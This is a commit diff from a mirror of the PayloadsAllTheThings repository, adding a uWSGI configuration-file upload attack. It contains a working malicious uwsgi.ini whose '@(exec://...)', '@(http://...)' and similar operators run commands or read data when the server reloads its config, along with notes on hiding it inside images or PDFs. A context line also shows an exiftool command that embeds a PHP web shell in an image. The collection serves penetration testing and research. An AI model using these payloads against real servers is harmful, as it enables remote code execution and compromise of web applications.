mirror of
https://github.com/swisskyrepo/PayloadsAllTheThings.git
synced 2025-01-18 09:25:26 +00:00
Merge pull request #629 from maxence-Doyensec/file-upload-uwsgi
add uwsgi configuration file to Upload Insecure File
This commit is contained in:
commit
776b2bd934
32
Upload Insecure Files/Configuration uwsgi.ini/README.md
Normal file
32
Upload Insecure Files/Configuration uwsgi.ini/README.md
Normal file
@ -0,0 +1,32 @@
|
||||
# uWSGI configuration file
|
||||
|
||||
uWSGI configuration files can include “magic” variables, placeholders and operators defined with a precise syntax. The ‘@’ operator in particular is used in the form of @(filename) to include the contents of a file. Many uWSGI schemes are supported, including “exec” - useful to read from a process’s standard output. These operators can be weaponized for Remote Command Execution or Arbitrary File Write/Read when a .ini configuration file is parsed:
|
||||
|
||||
Example of malicious uwsgi.ini file:
|
||||
|
||||
```ini
|
||||
[uwsgi]
|
||||
; read from a symbol
|
||||
foo = @(sym://uwsgi_funny_function)
|
||||
; read from binary appended data
|
||||
bar = @(data://[REDACTED])
|
||||
; read from http
|
||||
test = @(http://[REDACTED])
|
||||
; read from a file descriptor
|
||||
content = @(fd://[REDACTED])
|
||||
; read from a process stdout
|
||||
body = @(exec://whoami)
|
||||
; call a function returning a char *
|
||||
characters = @(call://uwsgi_func)
|
||||
```
|
||||
|
||||
When the configuration file will be parsed(e.g. restart, crash or autoreload) payload will be executed.
|
||||
|
||||
## uWSGI lax parsing
|
||||
|
||||
The uWSGI parsing of configuration file is lax. The previous payload can be embedded inside a binary file(e.g. image, pdf, ...).
|
||||
|
||||
## Thanks to
|
||||
|
||||
* [A New Vector For “Dirty” Arbitrary File Write to RCE - Doyensec - Maxence Schmitt and Lorenzo Stella](https://blog.doyensec.com/2023/02/28/new-vector-for-dirty-arbitrary-file-write-2-rce.html)
|
||||
|
13
Upload Insecure Files/Configuration uwsgi.ini/uwsgi.ini
Normal file
13
Upload Insecure Files/Configuration uwsgi.ini/uwsgi.ini
Normal file
@ -0,0 +1,13 @@
|
||||
[uwsgi]
|
||||
; read from a symbol
|
||||
foo = @(sym://uwsgi_funny_function)
|
||||
; read from binary appended data
|
||||
bar = @(data://[REDACTED])
|
||||
; read from http
|
||||
test = @(http://[REDACTED])
|
||||
; read from a file descriptor
|
||||
content = @(fd://[REDACTED])
|
||||
; read from a process stdout
|
||||
body = @(exec://whoami)
|
||||
; call a function returning a char *
|
||||
characters = @(call://uwsgi_func)
|
@ -136,12 +136,14 @@ exiftool -Comment="<?php echo 'Command:'; if($_POST){system($_POST['cmd']);} __h
|
||||
If you are trying to upload files to a :
|
||||
- PHP server, take a look at the [.htaccess](https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Upload%20Insecure%20Files/Configuration%20Apache%20.htaccess) trick to execute code.
|
||||
- ASP server, take a look at the [web.config](https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Upload%20Insecure%20Files/Configuration%20IIS%20web.config) trick to execute code.
|
||||
- uWSGI server, take a look at the [uwsgi.ini](https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Upload%20Insecure%20Files/Configuration%20uwsgi.ini/uwsgi.ini) trick to execute code.
|
||||
|
||||
Configuration files examples
|
||||
- [.htaccess](https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Upload%20Insecure%20Files/Configuration%20Apache%20.htaccess)
|
||||
- [web.config](https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Upload%20Insecure%20Files/Configuration%20IIS%20web.config)
|
||||
- [httpd.conf](https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Upload%20Insecure%20Files/Configuration%20Busybox%20httpd.conf)
|
||||
- [\_\_init\_\_.py](https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Upload%20Insecure%20Files/Configuration%20Python%20__init__.py)
|
||||
- [uwsgi.ini](https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Upload%20Insecure%20Files/Configuration%20uwsgi.ini/uwsgi.ini)
|
||||
|
||||
Alternatively you may be able to upload a JSON file with a custom scripts, try to overwrite a dependency manager configuration file.
|
||||
- package.json
|
||||
@ -214,3 +216,4 @@ Upload the XML file to `$JETTY_BASE/webapps/`
|
||||
* [A tip for getting RCE in Jetty apps with just one XML file! - Aug 4, 2022 - PT SWARM / @ptswarm](https://twitter.com/ptswarm/status/1555184661751648256/)
|
||||
* [Jetty Features for Hacking Web Apps - September 15, 2022 - Mikhail Klyuchnikov](https://swarm.ptsecurity.com/jetty-features-for-hacking-web-apps/)
|
||||
* [Inyección de código en imágenes subidas y tratadas con PHP-GD - Spanish Resource - hackplayers](https://www.hackplayers.com/2020/03/inyeccion-de-codigo-en-imagenes-php-gd.html)
|
||||
* [A New Vector For “Dirty” Arbitrary File Write to RCE - Doyensec - Maxence Schmitt and Lorenzo Stella](https://blog.doyensec.com/2023/02/28/new-vector-for-dirty-arbitrary-file-write-2-rce.html)
|
||||
|
Loading…
Reference in New Issue
Block a user